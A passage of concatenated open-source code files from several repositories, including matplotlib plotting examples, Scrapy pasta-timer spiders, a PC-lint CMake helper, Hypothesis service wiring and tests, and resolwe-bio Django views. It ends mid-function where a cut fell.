ax.barh(dateyearly[yearly > 0], yearly[yearly > 0], height=barwidth, color='pink', edgecolor='')
fig.savefig("bar_5.png")
# 6. Cycle through colors
fig, ax = plt.subplots(figsize=(10,5))
ax.bar(dateyearly, yearly, color=["yellow", "orange", "red"], edgecolor='black')
fig.savefig("bar_6.png")
# 7. Categorical data
x = [1,2,3,4,5,6,7,8]
y = [154900,56600,40000,30200,29700,24400,21700,13900]
labels = ["Lung","Colon/rectum","Breast","Prostate","Pancreas",
"Non-Hodgkin's\n Lymphoma","Leukemias","Ovary"]
barcolors = ["firebrick","red","orange","green",
"navy","blue","SkyBlue","SlateBlue"]
fig, ax = plt.subplots(constrained_layout=True)
ax.bar(x, y, color=barcolors)
ax.set_xticks(x)
ax.set_xticklabels(labels, rotation=45.)
ax.tick_params(axis='x', length=0)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
fig.suptitle("Estimated Cancer Deaths for 2002")
fig.savefig("bar_7.png")
# 8. Stacked bar chart
cities = ["a","b","c"]
ncities = len(cities)
d1 = np.array([1.0, 2.0, 3.0])
d2 = np.array([0.3, 0.5, 0.7])
d3 = np.array([0.5, 0.5, 0.5])
d4 = np.array([1.0, 1.0, 1.0])
fig, ax = plt.subplots(figsize=(3,9), constrained_layout=True)
b1 = ax.bar(np.arange(ncities), d1, label="Q1")
b2 = ax.bar(np.arange(ncities), d2, bottom=d1, label="Q2")
b3 = ax.bar(np.arange(ncities), d3, bottom=d1+d2, label="Q3")
b3 = ax.bar(np.arange(ncities), d4, bottom=d1+d2+d3, label="Q4")
ax.set_xticks(np.arange(ncities))
ax.set_xticklabels(cities)
fig.legend(loc='upper center')
fig.savefig("bar_8.png")
# Example 9
# Compare with http://www.ncl.ucar.edu/Applications/Images/bar_22_lg.png
# note: We do not try to set the bottom of bars to be below zero,
# as it makes no sense to do so.
times = np.array([3, 4, 5, 6]) # hours
time_strings = [f"{t:02d}:00" for t in times]
sflow = np.array([[0.0, 0.16, 0.20, 0.19],
[0.0, 0.15, 0.71, 0.61],
[0.0, 0.0, 0.25, 0.14],
[0.0, 0.0, 0.14, 0.19]])
ntime = len(times)
titles = [f"Station {i}" for i in range(1,ntime+1)]
clrs = ['navy', 'firebrick', 'goldenrod', 'green']
fig, ax = plt.subplots(nrows=2, ncols=2, constrained_layout=True, sharex=True, sharey=True)
aa = ax.ravel()
[a.set_facecolor('lightgray') for a in aa]
[a.grid(b=True, which='both', axis='both', color='white', zorder=0) for a in aa]
for i in range(sflow.shape[0]):
aa[i].bar(times, sflow[i,:], edgecolor='black', color=clrs, zorder=50)
aa[-1].set_ylim([-.1, 1])
[aa[i].set_title(t) for i, t in enumerate(titles)]
aa[-1].set_xticks(times)
aa[-1].set_xticklabels(time_strings)
fig.text(-0.05, 0.5, 'STREAMFLOW', va='center', rotation='vertical')
fig.savefig("bar_9.png", bbox_inches='tight') # bbox_inches option to get ytitle in file
```
|
{
"source": "jenkin/course-ml-pieroit",
"score": 3
}
|
#### File: jenkin/course-ml-pieroit/esercizio_2.py
```python
import pandas as pd
from pandas.plotting import scatter_matrix
import matplotlib.pyplot as plt
from sklearn.datasets import load_breast_cancer
def main():
"""
    Exercise 2
"""
    # load the dataset
dataset = load_breast_cancer()
    # convert to a pandas dataframe and assign column names
dataset_df = pd.DataFrame(dataset.data)
dataset_df.columns = dataset.feature_names
    # print summary information
print(dataset_df.head())
print(dataset_df.describe())
    # exploratory plots
plt.rcParams['axes.labelsize'] = 4
plt.rcParams["axes.linewidth"] = 1.0
plt.rcParams["xtick.major.size"] = 0
plt.rcParams["ytick.major.size"] = 0
plt.rcParams["xtick.minor.size"] = 0
plt.rcParams["ytick.minor.size"] = 0
scatter_matrix(dataset_df[ dataset_df.columns ], figsize=(5, 5), s = 1)
plt.savefig('breast_cancer_dataset.png', dpi = 1200)
#plt.show()
main()
```
|
{
"source": "jenkin/pasta-timers-scrapers",
"score": 2
}
|
#### File: pasta-timers-scrapers/pasta/pipelines.py
```python
from scrapy.exceptions import DropItem
import re
class PastaPipeline(object):
pattern = re.compile(r" {2,}")
def process_item(self, item, spider):
if item.get("time"):
return {
key: self.pattern.sub(" ", item[key].strip()) if isinstance(item[key], str) else item[key]
for key in item.keys()
}
else:
raise DropItem("Missing time in %s" % item)
```
#### File: pasta/spiders/dececco.py
```python
import scrapy, json, re
class DeCeccoSpider(scrapy.Spider):
name = "<NAME>"
domain = "https://www.dececco.com"
allowed_domains = ["www.dececco.com","dececco.com"]
time_pattern = re.compile(r"\d+")
start_urls = [
"https://www.dececco.com/it_it/products/pasta-di-semola/",
"https://www.dececco.com/it_it/products/pasta-alluovo/",
"https://www.dececco.com/it_it/products/paste-speciali/",
"https://www.dececco.com/it_it/products/prodotti-integrali/",
"https://www.dececco.com/it_it/products/prodotti-bio/"
]
def parse(self, response):
for href in response.css(".products > li > a::attr(href)"):
yield response.follow(href, self.parse_product)
def parse_product(self, response):
yield {
"producer": self.name,
"line": "",
"name": response.css("scheda__hero__title::text").get(default=""),
"type": "",
"time": self.extract_time(response.css(".infolist::text").get(default="")),
"url": response.request.url,
"image": response.css(".scheda__hero__image > img::attr(src)").get(default="")
}
def extract_time(self, s):
try:
return int(self.time_pattern.search(s).group())
except:
return 0
```
#### File: pasta/spiders/garofalo.py
```python
import scrapy, json, re
class GarofaloSpider(scrapy.Spider):
name = "Garofalo"
domain = "https://www.pasta-garofalo.com"
allowed_domains = ["www.pasta-garofalo.com","pasta-garofalo.com"]
time_pattern = re.compile(r"\d+")
start_urls = [
"https://www.pasta-garofalo.com/it/prodotti/pasta-di-semola-di-grano-duro/",
"https://www.pasta-garofalo.com/it/prodotti/la-giostra-dei-bambini/",
"https://www.pasta-garofalo.com/it/prodotti/pasta-integrale-biologica/",
"https://www.pasta-garofalo.com/it/prodotti/pasta-senza-glutine/",
"https://www.pasta-garofalo.com/it/prodotti/pasta-legumi-e-cereali/",
"https://www.pasta-garofalo.com/it/prodotti/tanto-per-cambiare-latipica-cucina-italiana/",
"https://www.pasta-garofalo.com/it/prodotti/pasta-fresca-pasta-garofalo/",
"https://www.pasta-garofalo.com/it/prodotti/gnocchi/"
]
def parse(self, response):
for href in response.css(".product-preview-box .img-uri::attr(href)"):
yield response.follow(href, self.parse_product)
def parse_product(self, response):
yield {
"producer": self.name,
"line": response.css("#content > section > div:nth-child(1) > div.row.wow.fadeInUp > div > div > ul > li:nth-child(3) > p::text").get(default=""),
"name": response.css("#content > section > div:nth-child(1) > div.row.content-product > div:nth-child(1) > h1::text").get(default=""),
"type": response.css("#content > section > div:nth-child(1) > div.row.content-product > div:nth-child(1) > blockquote > a:nth-child(2)::text").get(default=""),
"time": self.extract_time(response.css("#content > section > div:nth-child(1) > div.row.wow.fadeInUp > div > div > ul > li:nth-child(1) > p::text").get(default="")),
"url": response.request.url,
"image": response.css("#content > section > div:nth-child(1) > div.row.content-product > div.col-sm-6.hidden-xs.wow.fadeInUp > img::attr(src)").get(default="")
}
def extract_time(self, s):
try:
return int(self.time_pattern.search(s).group())
except:
return 0
```
|
{
"source": "Jenkins183/ParallelProject",
"score": 4
}
|
#### File: Jenkins183/ParallelProject/insertionSort.py
```python
import time
import multiprocessing as mp
numProc = 4 # Starting number of Processes
# Serial Insertion Sort
# Slightly modified from: http://interactivepython.org/courselib/static/pythonds/SortSearch/TheInsertionSort.html
def serialInsertionSort(alist):
for index in range(1,len(alist)):
currentvalue = alist[index]
position = index
while position > 0 and alist[position - 1] > currentvalue:
alist[position] = alist[position - 1]
position = position - 1
alist[position] = currentvalue
return alist
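# Worked trace (illustrative): serialInsertionSort([3, 1, 2])
#   index 1: currentvalue=1, 3 shifts right -> [1, 3, 2]
#   index 2: currentvalue=2, 3 shifts right -> [1, 2, 3]
# i.e. each pass inserts alist[index] into the already-sorted prefix alist[:index].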
def multiInsertionSort(conn, alist):
startTime = time.time()
alist = serialInsertionSort(alist)
endTime = time.time()
print("Insertion Sort Completed")
conn.send([alist, endTime - startTime])
conn.close()
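# Sketch of how multiInsertionSort could be driven through a Pipe (the names below are
# illustrative, not part of the original code):
#   parent_conn, child_conn = mp.Pipe()
#   p = mp.Process(target=multiInsertionSort, args=(child_conn, alist))
#   p.start()
#   sorted_list, elapsed = parent_conn.recv()
#   p.join()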
def main():
startTime = time.time()
# Serial Calls
alist = [54, 26, 93, 17, 77, 31, 44, 55, 20, 100, -1, 8, 33, 33, 55, 0, 3, 90, 100000, 4444, -33]
print("Unsorted:", alist)
serialSortedList = serialInsertionSort(alist)
endTime = time.time()
totalTime = endTime - startTime
print("Serial Sorted:", serialSortedList)
print("Execution time: {} seconds".format(totalTime))
# Multiprocessing Calls
"""
processes = []
for i in range(numProc):
p = mp.Process(target = multiInsertionSort, args = [alist,])
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
#print("Multiprocessing Sorted:", multiSortedList)
"""
if __name__ == "__main__":
main()
```
|
{
"source": "jenkins-head/jenkins-head-controller",
"score": 2
}
|
#### File: src/ble/GattServerConnector.py
```python
import pygatt
import logging
class GattServerConnector(object):
__rgbMap = {
'SUCCESS': {
'red': bytearray('200', 'utf-8'),
'green': bytearray('200', 'utf-8'),
'blue': bytearray('200', 'utf-8')
},
'FAILURE': {
'red': bytearray('255', 'utf-8'),
'green': bytearray('0', 'utf-8'),
'blue': bytearray('0', 'utf-8')
},
}
__redUuid = '2e252e00-2f8b-4326-91de-26742dda4aa7'
__greenUuid = '6aeba5cd-4476-43b6-830b-021109ae6dea'
__blueUuid = '46f27bf3-5b1c-403e-bc20-90934a784e66'
__brightnessUuid = 'fc75589b-54ae-4b28-b54d-a35979f42b39'
def __init__(self, bleAddress: str):
self.__bluethoothAdapter = None
self.__bleAddress = bleAddress
def sendStatus(self, status: str):
rgbDict = self.__rgbMap[status]
if rgbDict:
self.__setRgbValues(rgbDict['red'], rgbDict['green'], rgbDict['blue'])
def __setRgbValues(self, red: str, green: str, blue: str):
try:
self.__handleBluetoothConnection()
self.__device.char_write(self.__redUuid, red)
self.__device.char_write(self.__greenUuid, green)
self.__device.char_write(self.__blueUuid, blue)
except Exception as exception:
logging.debug('Error on write: ' + str(exception))
def __handleBluetoothConnection(self):
if self.__bluethoothAdapter is None:
self.__bluethoothAdapter = pygatt.GATTToolBackend()
self.__bluethoothAdapter.start()
self.__device = self.__bluethoothAdapter.connect(self.__bleAddress)
    def __del__(self):
        if self.__bluethoothAdapter is not None:
            self.__bluethoothAdapter.stop()
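# Usage sketch (illustrative; the BLE address is a made-up placeholder):
#   connector = GattServerConnector('AA:BB:CC:DD:EE:FF')
#   connector.sendStatus('SUCCESS')   # writes the RGB values mapped to 'SUCCESS'
#   connector.sendStatus('FAILURE')   # writes red for a failed build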
```
#### File: jenkins-head-controller/src/SignalHandler.py
```python
import signal
class SignalHandler:
__terminationRequested = False
def __init__(self):
signal.signal(signal.SIGINT, self.__handleSignal)
signal.signal(signal.SIGTERM, self.__handleSignal)
def __handleSignal(self, signum, frame):
self.__terminationRequested = True
def isTerminationRequested(self) -> bool:
return self.__terminationRequested
```
#### File: tests/SignalHandler/test_SignalHandler.py
```python
import mock
import pytest
from SignalHandler import SignalHandler
class TestSingalHandler(object):
@pytest.mark.parametrize('terminationRequested', [
True,
False
])
@mock.patch.object(SignalHandler, '_SignalHandler__terminationRequested', new_callable=mock.PropertyMock)
def test_singalHandlerGetter(self, mock_terminationRequested, terminationRequested):
mock_terminationRequested.return_value = terminationRequested
signalHandler = SignalHandler()
assert signalHandler.isTerminationRequested() == terminationRequested
@mock.patch('signal.signal')
def test_singalHandlerHandlerSignal(self, mock_signal):
signalHandler = SignalHandler()
assert mock_signal.call_count == 2
callArgumentList = mock_signal.mock_calls[0]
callbackMethod = callArgumentList.args[1]
callbackMethod(None, None)
assert signalHandler.isTerminationRequested() is True
```
|
{
"source": "jenkins-hypothesis/h",
"score": 2
}
|
#### File: h/services/__init__.py
```python
from __future__ import unicode_literals
def includeme(config):
config.register_service_factory(
".annotation_json_presentation.annotation_json_presentation_service_factory",
name="annotation_json_presentation",
)
config.register_service_factory(
".annotation_moderation.annotation_moderation_service_factory",
name="annotation_moderation",
)
config.register_service_factory(
".annotation_stats.annotation_stats_factory", name="annotation_stats"
)
config.register_service_factory(
".auth_ticket.auth_ticket_service_factory",
iface="pyramid_authsanity.interfaces.IAuthService",
)
config.register_service_factory(
".auth_token.auth_token_service_factory", name="auth_token"
)
config.register_service_factory(
".annotation_delete.annotation_delete_service_factory", name="annotation_delete"
)
config.register_service_factory(
".delete_group.delete_group_service_factory", name="delete_group"
)
config.register_service_factory(
".delete_user.delete_user_service_factory", name="delete_user"
)
config.register_service_factory(
".developer_token.developer_token_service_factory", name="developer_token"
)
config.register_service_factory(".feature.feature_service_factory", name="feature")
config.register_service_factory(".flag.flag_service_factory", name="flag")
config.register_service_factory(
".flag_count.flag_count_service_factory", name="flag_count"
)
config.register_service_factory(".group.groups_factory", name="group")
config.register_service_factory(
".group_create.group_create_factory", name="group_create"
)
config.register_service_factory(
".group_update.group_update_factory", name="group_update"
)
config.register_service_factory(
".group_links.group_links_factory", name="group_links"
)
config.register_service_factory(
".group_members.group_members_factory", name="group_members"
)
config.register_service_factory(
".groupfinder.groupfinder_service_factory", iface="h.interfaces.IGroupService"
)
config.register_service_factory(".links.links_factory", name="links")
config.register_service_factory(".group_list.group_list_factory", name="group_list")
config.register_service_factory(
".group_scope.group_scope_factory", name="group_scope"
)
config.register_service_factory(
".list_organizations.list_organizations_factory", name="list_organizations"
)
config.register_service_factory(".nipsa.nipsa_factory", name="nipsa")
config.register_service_factory(
".oauth_provider.oauth_provider_service_factory", name="oauth_provider"
)
config.register_service_factory(
".oauth_validator.oauth_validator_service_factory", name="oauth_validator"
)
config.register_service_factory(
".organization.organization_factory", name="organization"
)
config.register_service_factory(
".rename_user.rename_user_factory", name="rename_user"
)
config.register_service_factory(".settings.settings_factory", name="settings")
config.register_service_factory(".user.user_service_factory", name="user")
config.register_service_factory(
".user_unique.user_unique_factory", name="user_unique"
)
config.register_service_factory(
".user_password.user_password_service_factory", name="user_password"
)
config.register_service_factory(
".user_signup.user_signup_service_factory", name="user_signup"
)
config.register_service_factory(
".user_update.user_update_factory", name="user_update"
)
config.add_directive(
"add_annotation_link_generator", ".links.add_annotation_link_generator"
)
config.add_request_method(
".feature.FeatureRequestProperty", name="feature", reify=True
)
```
#### File: tests/functional/test_groups.py
```python
from __future__ import unicode_literals
import pytest
@pytest.mark.xfail # See https://github.com/hypothesis/product-backlog/issues/109
@pytest.mark.functional
def test_group_page_includes_referrer_tag(app, db_session, factories, user):
"""
The group read page should include a referrer tag.
When a logged-in user who is a member of the group visits the group's page,
the page should include a `<meta name="referrer" ...` tag that asks the
browser not to send the path part of the page's URL to third-party servers
in the Referer header when following links on the page.
This is because the group's URL is secret - if you have it you can join
the group.
"""
group = factories.Group(creator=user)
db_session.commit()
res = app.get("/groups/{pubid}/{slug}".format(pubid=group.pubid, slug=group.slug))
assert res.html.head.find("meta", attrs={"name": "referrer"}, content="origin")
@pytest.mark.functional
def test_submit_create_group_form_without_xhr_returns_full_html_page(app):
res = app.get("/groups/new")
group_form = res.forms["deform"]
group_form["name"] = "My New Group"
res = group_form.submit().follow()
assert res.text.startswith("<!DOCTYPE html>")
@pytest.mark.functional
def test_submit_create_group_form_with_xhr_returns_partial_html_snippet(app):
res = app.get("/groups/new")
group_form = res.forms["deform"]
group_form["name"] = "My New Group"
res = group_form.submit(xhr=True)
assert res.body.strip(b"\n").startswith(b"<form")
@pytest.mark.functional
def test_submit_create_group_form_with_xhr_returns_plain_text(app):
res = app.get("/groups/new")
group_form = res.forms["deform"]
group_form["name"] = "My New Group"
res = group_form.submit(xhr=True)
assert res.content_type == "text/plain"
@pytest.fixture
def user(db_session, factories):
# Password is '<PASSWORD>'
user = factories.User(
password="<PASSWORD>"
)
db_session.commit()
return user
@pytest.fixture
def app(app, user):
res = app.get("/login")
res.form["username"] = user.username
res.form["password"] = "<PASSWORD>"
res.form.submit()
return app
```
|
{
"source": "jenkinz/cmake-project-template",
"score": 3
}
|
#### File: cmake-project-template/cmake/lint.py
```python
import subprocess
import sys
FAIL_BUILD_ON_VIOLATION = False
def lint(argv):
"""
Invokes linting tool with given arguments and source file. This program
always writes the output to stdout. :param argv: pass all arguments to the
underlying PC-lint executable, and the source file to analyze :return: the
process exit code (-1 if a function violation is reported to stderr)
"""
# argv[1] - the lint executable name (must be in PATH or include the
# fully-qualified path)
lint_exe = argv[1]
# argv[2] - unit (single source module) or global (all modules with global
# wrap-up)
unit = (argv[2] == "--unit" or argv[2] == "-u")
# argv[3] - include path for lint option files
lint_inc = argv[3]
# argv[4] - compiler options file
co_gcc_lnt = argv[4]
# argv[5] - standards check rules options file
stds_lnt = argv[5]
# argv[6] - include directories separated by ';'
include_dirs = argv[6]
# argv[7] = compiler defines separated by ';'
defines = argv[7]
# argv[8] - the source file(s)
sources = argv[8]
# argv[9] - output file
output_file = argv[9]
if unit:
unit_opt = "-u"
else:
unit_opt = ""
includes = include_dirs.split(';')
lint_includes = []
for inc in includes:
if len(inc) > 0:
lint_includes.append("-i" + inc) # prepend "-i" to each include dir (required for lint command)
defs = defines.split(';')
lint_defines = []
for define in defs:
if len(define) > 0:
if "=" in define:
sep = define.split("=")
define = sep[0] + "=" + '"' + sep[1] + '"' # surround rvalue with quotes
lint_defines.append("-d" + define) # prepend "-d" to each define (required for lint command)
sources = sources.split(';')
lint_sources = []
for src in sources:
if len(src) > 0 and not src.endswith((".S", ".s", ".asm")): # exclude assembly source files (C/C++ only)
lint_sources.append(src)
# note: '-frz' option is specified below to return nonzero exit status on
# one or more PC-lint violation(s)
cmd = f'{lint_exe} {lint_inc} {co_gcc_lnt} {stds_lnt} options.lnt {" ".join(lint_includes)} {" ".join(lint_defines)} -frz {unit_opt} {" ".join(lint_sources)}'
completed_process = subprocess.run(args=cmd, capture_output=True, shell=True, text=True)
if completed_process.returncode > 0: # return code is violation count
# sys.stderr.write(completed_process.stderr) # hide banner output
sys.stdout.write(completed_process.stdout)
# log to output file
f = open(output_file, "w")
f.write(completed_process.stderr)
f.seek(len(completed_process.stderr))
f.write(completed_process.stdout)
f.close()
if FAIL_BUILD_ON_VIOLATION:
return completed_process.returncode
else:
return 0
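# Example invocation (hypothetical paths and arguments, for illustration only):
#   python lint.py pclp64 --unit /opt/lint co-gcc.lnt au-misra3.lnt "inc1;inc2" "DEBUG=1;USE_FOO" "src/a.c;src/b.c" lint_report.txt
# which builds and runs a PC-lint command roughly like:
#   pclp64 /opt/lint co-gcc.lnt au-misra3.lnt options.lnt -iinc1 -iinc2 -dDEBUG="1" -dUSE_FOO -frz -u src/a.c src/b.c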
if __name__ == "__main__":
sys.exit(lint(sys.argv))
```
|
{
"source": "JenkoB/resolwe-bio",
"score": 2
}
|
#### File: resolwe-bio/resolwe_bio/apps.py
```python
from django.apps import AppConfig
class BaseConfig(AppConfig):
"""App configuration."""
name = 'resolwe_bio'
verbose_name = 'Resolwe Bioinformatics'
def ready(self):
"""Perform application initialization."""
# Register signals handlers
from . import signals # pylint: disable=unused-variable
```
#### File: resolwe_bio/kb/search_indexes.py
```python
from haystack import indexes
from .models import Feature, Mapping
class FeatureIndex(indexes.SearchIndex, indexes.Indexable):
"""Feature search index definition."""
# This is a workaround for the Haystack limitation that all document=True fields
# on all indices in the whole application must be of the same type. Therefore, we
# use a CharField and have a separate MultiValueField.
text = indexes.CharField(document=True)
genes = indexes.MultiValueField()
source = indexes.CharField(model_attr='source')
name_auto = indexes.EdgeNgramField(boost=10.0)
aliases_auto = indexes.EdgeNgramField()
def get_model(self):
"""Model to index."""
return Feature
def prepare_text(self, obj):
"""Prepare the value for the 'text' field during indexing."""
return '\n'.join(self.prepare_genes(obj))
def prepare_genes(self, obj):
"""Prepare the value for the 'genes' field during indexing."""
return [obj.name, obj.feature_id] + obj.aliases
def prepare_name_auto(self, obj):
"""Prepare the value for the 'name_auto' field during indexing."""
return ' '.join([obj.name, obj.feature_id])
def prepare_aliases_auto(self, obj):
"""Prepare the value for the 'aliases_auto' field during indexing."""
return ' '.join(obj.aliases)
class MappingIndex(indexes.SearchIndex, indexes.Indexable):
"""Mapping search index definition."""
text = indexes.CharField(document=True)
# TODO: All these fields should not use the 'snowball' analyzer (Haystack limitation!).
relation_type = indexes.CharField(model_attr='relation_type')
source_db = indexes.CharField(model_attr='source_db')
source_id = indexes.CharField(model_attr='source_id')
target_db = indexes.CharField(model_attr='target_db')
target_id = indexes.CharField(model_attr='target_id')
def get_model(self):
"""Model to index."""
return Mapping
def prepare_text(self, obj):
"""Prepare the value for the 'text' field during indexing."""
return '\n'.join([obj.source_db, obj.source_id, obj.target_db, obj.target_id])
```
#### File: resolwe_bio/kb/views.py
```python
from django.utils.decorators import classonlymethod
from rest_framework import viewsets, mixins, permissions, filters
from haystack.query import SQ
from drf_haystack.viewsets import HaystackViewSet
from .models import Feature, Mapping
from .serializers import (FeatureSerializer, FeatureSearchSerializer, FeatureAutocompleteSerializer,
MappingSerializer, MappingSearchSerializer)
from .filters import MappingFilter
class FeatureSearchViewSet(HaystackViewSet):
"""
Endpoint used for feature search.
Request:
- query
- source
Response:
- a list of matching features
"""
index_models = [Feature]
serializer_class = FeatureSearchSerializer
@classonlymethod
def as_view(cls, actions=None, **initkwargs):
"""Support POST for searching against a list of genes."""
if actions.get('get', None) == 'list':
actions['post'] = 'list_with_post'
return super(cls, FeatureSearchViewSet).as_view(actions, **initkwargs)
def filter_queryset(self, queryset):
"""Support filtering by a list of genes."""
queryset = super(FeatureSearchViewSet, self).filter_queryset(queryset)
if 'query' in self.request.data:
queryset = queryset.filter(genes__in=self.request.data['query'])
if 'source' in self.request.data:
queryset = queryset.filter(source=self.request.data['source'])
return queryset
def list_with_post(self, request):
"""Support search via a POST request in addition to GET."""
return self.list(request)
class FeatureAutocompleteViewSet(HaystackViewSet):
"""Endpoint used for feature autocompletion."""
index_models = [Feature]
serializer_class = FeatureAutocompleteSerializer
def filter_queryset(self, queryset):
"""Construct a correct filter query."""
query = self.request.query_params.get('query', None)
if not query:
return queryset.none()
queryset = queryset.filter(SQ(name_auto=query) | SQ(aliases_auto=query))
source = self.request.query_params.get('source', None)
if source:
queryset = queryset.filter(source=source)
return queryset
class FeatureViewSet(mixins.ListModelMixin,
mixins.RetrieveModelMixin,
mixins.CreateModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
viewsets.GenericViewSet):
"""API view for :class:`Feature` objects."""
serializer_class = FeatureSerializer
permission_classes = [permissions.IsAdminUser]
filter_backends = [filters.DjangoFilterBackend]
queryset = Feature.objects.all()
def create(self, request):
"""A custom create, which updates existing features instead of failing."""
try:
feature = Feature.objects.get(
source=request.data['source'],
feature_id=request.data['feature_id']
)
self.kwargs[self.lookup_field] = feature.pk
return super(FeatureViewSet, self).update(request) # pylint: disable=no-member
except (Feature.DoesNotExist, KeyError): # pylint: disable=no-member
return super(FeatureViewSet, self).create(request) # pylint: disable=no-member
class MappingSearchViewSet(HaystackViewSet):
"""
Endpoint used for mapping search.
Request:
- source_id
- source_db
- target_id
- target_db
- relation_type
Response:
- a list of matching mappings
"""
index_models = [Mapping]
serializer_class = MappingSearchSerializer
@classonlymethod
def as_view(cls, actions=None, **initkwargs):
"""Support POST for searching against a list of genes."""
if actions.get('get', None) == 'list':
actions['post'] = 'list_with_post'
return super(cls, MappingSearchViewSet).as_view(actions, **initkwargs)
def filter_queryset(self, queryset):
"""Support filtering by a list of genes."""
queryset = super(MappingSearchViewSet, self).filter_queryset(queryset)
if 'source_id' in self.request.data:
queryset = queryset.filter(source_id__in=self.request.data['source_id'])
if 'source_db' in self.request.data:
queryset = queryset.filter(source_db=self.request.data['source_db'])
if 'target_id' in self.request.data:
queryset = queryset.filter(target_id__in=self.request.data['target_id'])
if 'target_db' in self.request.data:
queryset = queryset.filter(target_db=self.request.data['target_db'])
if 'relation_type' in self.request.data:
queryset = queryset.filter(relation_type=self.request.data['relation_type'])
return queryset
def list_with_post(self, request):
"""Support search via a POST request in addition to GET."""
return self.list(request)
class MappingViewSet(mixins.ListModelMixin,
mixins.RetrieveModelMixin,
mixins.CreateModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
viewsets.GenericViewSet):
"""API view for :class:`Mapping` objects."""
serializer_class = MappingSerializer
permission_classes = [permissions.IsAdminUser]
filter_backends = [filters.DjangoFilterBackend]
filter_class = MappingFilter
queryset = Mapping.objects.all()
def create(self, request):
"""A custom create, which updates existing mappings instead of failing."""
try:
mapping = Mapping.objects.get(
source_db=request.data['source_db'],
source_id=request.data['source_id'],
target_db=request.data['target_db'],
target_id=request.data['target_id']
)
self.kwargs[self.lookup_field] = mapping.pk
return super(MappingViewSet, self).update(request) # pylint: disable=no-member
except (Mapping.DoesNotExist, KeyError): # pylint: disable=no-member
return super(MappingViewSet, self).create(request) # pylint: disable=no-member
```
#### File: management/commands/generate_geneset.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import csv
import gzip
import json
import logging
import os
import random
import string
import datetime
from django.core.management.base import BaseCommand
from django.conf import settings
from django.utils import timezone
from resolwe.flow.models import Data, Storage
from resolwe.utils import BraceMessage as __
from .utils import get_descriptorschema, get_process, get_superuser
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class Command(BaseCommand):
"""Generate gene set data."""
help = "Generate test gene sets."
def __init__(self, *args, **kwargs):
"""Set command defaults."""
super(Command, self).__init__(*args, **kwargs)
self.data_dir = settings.FLOW_EXECUTOR['DATA_DIR']
self.test_files_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'files'))
def add_arguments(self, parser):
"""Define command arguments."""
parser.add_argument('-n', '--n-geneset', type=int, default=5,
help="Number of gene sets to generate (default: %(default)s)")
parser.add_argument('--rseed', action='store_true', help="Use fixed random seed")
@staticmethod
def get_random_word(length):
"""Generate a random word."""
return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
@staticmethod
def generate_geneset_file(gene_ids, num, path):
"""Generate gene set file."""
with gzip.open(os.path.join(path, 'geneset.tab.gz'), 'wt') as f:
csvwriter = csv.writer(f, delimiter=str('\t'), lineterminator='\n')
with gzip.open(gene_ids, mode='rt') as gene_ids:
all_genes = [line.strip() for line in gene_ids]
geneset = sorted(set([random.choice(all_genes) for _ in range(num)]))
for gene in geneset:
csvwriter.writerow([gene])
json_dump = json.dumps({'genes': geneset}, indent=4, sort_keys=True)
with open(os.path.join(path, 'geneset.json'), 'w') as json_file:
json_file.write(json_dump)
def create_geneset(self):
"""Create gene set object."""
started = timezone.now()
geneset = Data.objects.create(
name='GeneSet_{}_{}'.format(random.choice(['Hs', 'Mm']), self.get_random_word(3)),
process=get_process('upload-geneset'),
contributor=get_superuser(),
started=started,
finished=started + datetime.timedelta(seconds=5),
descriptor_schema=get_descriptorschema('geneset'),
descriptor={'description': 'Gene set description.'},
status=Data.STATUS_PROCESSING,
input={'src': {'file': 'geneset.tab.gz'}, 'source': 'UCSC'})
mouse_genes = os.path.join(self.test_files_path, 'mouse_genes.tab.gz')
os.mkdir(os.path.join(self.data_dir, str(geneset.id)))
self.generate_geneset_file(mouse_genes,
random.randint(15, 150),
os.path.join(self.data_dir, str(geneset.id)))
json_object = Storage.objects.create(
json=json.load(open(os.path.join(self.data_dir, str(geneset.id), 'geneset.json'))),
contributor=get_superuser(),
name='{}_storage'.format(geneset.name),
data=geneset)
os.remove(os.path.join(self.data_dir, str(geneset.id), 'geneset.json'))
geneset.output = {
'geneset': {'file': 'geneset.tab.gz'},
'geneset_json': json_object.id,
'source': 'UCSC'
}
geneset.status = Data.STATUS_DONE
geneset.save()
with open(os.path.join(self.data_dir, str(geneset.id), 'stdout.txt'), 'w') as stdout:
stdout.write('Generate gene set. Gene set was created '
'with the generate_geneset django-admin command.')
logger.info(__('Created Gene set object: (id={})', geneset.id))
def handle(self, *args, **options):
"""Command handle."""
if options['rseed']:
random.seed(42)
for _ in range(options['n_geneset']):
self.create_geneset()
```
#### File: resolwe-bio/resolwe_bio/serializers.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from rest_framework import serializers
from resolwe.flow.serializers import CollectionSerializer
from .models import Sample
class SampleSerializer(CollectionSerializer):
"""Serializer for sample."""
collections = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
def create(self, validated_data):
"""Create ``Sample``and set ``presample``to ``False``."""
validated_data['presample'] = False
return super(SampleSerializer, self).create(validated_data)
class Meta(CollectionSerializer.Meta):
"""Serializer configuration."""
model = Sample
fields = CollectionSerializer.Meta.fields + ('collections',)
read_only_fields = CollectionSerializer.Meta.read_only_fields + ('presample',)
class PresampleSerializer(CollectionSerializer):
"""Serializer for presample."""
collections = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
class Meta(CollectionSerializer.Meta):
"""Serializer configuration."""
model = Sample
fields = CollectionSerializer.Meta.fields + ('collections', 'presample')
```
#### File: resolwe-bio/resolwe_bio/signals.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from django.db.models.signals import pre_delete, post_save
from django.dispatch import receiver
from guardian import shortcuts
from resolwe.flow.models import Data, DescriptorSchema, iterate_schema
from .models import Sample
@receiver(post_save, sender=Data)
def add_post_save_handler(sender, instance, **kwargs):
"""Add object to flow_collection.
* Only add `Data object` to `Sample` if process has defined
`flow_collection` field.
* Add object to an existing `Sample` if the `input objects` that
belong to the `flow collection` (though not necessarily all
`input objects`) are part of the same `Sample`.
* If `input objects` belong to different `Samples` or do not belong
to any `Sample`, create new `Sample`.
Collect IDs of all `input objects`.
"""
if kwargs['created'] and instance.process.flow_collection:
input_objects = []
for field_schema, fields, _ in iterate_schema(instance.input, instance.process.input_schema, ''):
